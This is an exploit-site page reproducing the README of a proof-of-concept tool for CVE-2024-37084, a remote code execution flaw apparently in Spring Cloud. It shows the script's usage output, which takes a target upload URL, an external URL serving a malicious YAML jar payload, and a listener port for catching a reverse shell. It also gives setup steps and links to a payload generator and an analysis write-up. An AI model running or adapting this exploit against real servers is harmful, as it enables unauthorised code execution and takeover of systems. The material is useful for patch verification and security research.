## https://sploitus.com/exploit?id=A17EFF4F-FE88-593E-8610-8796E9BCA713
# CVE-2024-37084-Poc
Setup ,Analysis , Demo exploit and poc about CVE-2024-37084
# How to use :
```
py .\CVE-2024-37084-Poc.py
usage: python CVE-2024-37084-Poc.py --target_url <target_url> --version <version> --payload_url <payload_url> [--listen_ip <listen_ip>] [--listen_port <listen_port>]
PoC for CVE-2024-37084 - Remote Code Execution
optional arguments:
-h, --help show this help message and exit
--target_url TARGET_URL
URL of the target server (e.g., http://target_ip:port/api/package/upload)
--version VERSION Version of the package (e.g., 5.0.0)
--payload_url PAYLOAD_URL
URL to the malicious payload (e.g., https://too.lewd.se/yaml-payload.jar)
--listen_ip LISTEN_IP
IP to listen for the reverse shell (default: 0.0.0.0)
--listen_port LISTEN_PORT
Port to listen for the reverse shell (default: 4444)
```
Setup listen port to catch the shell :
![image](https://github.com/user-attachments/assets/110fc123-259a-4b72-927d-ab2a55f225ec)
Link setup , analysis and Demo by me [Link](https://kayiyan.gitbook.io/research/cve/cve-2024-37084-spring-cloud-remote-code-execution)
For yaml payload can use : [Link](https://github.com/artsploit/yaml-payload)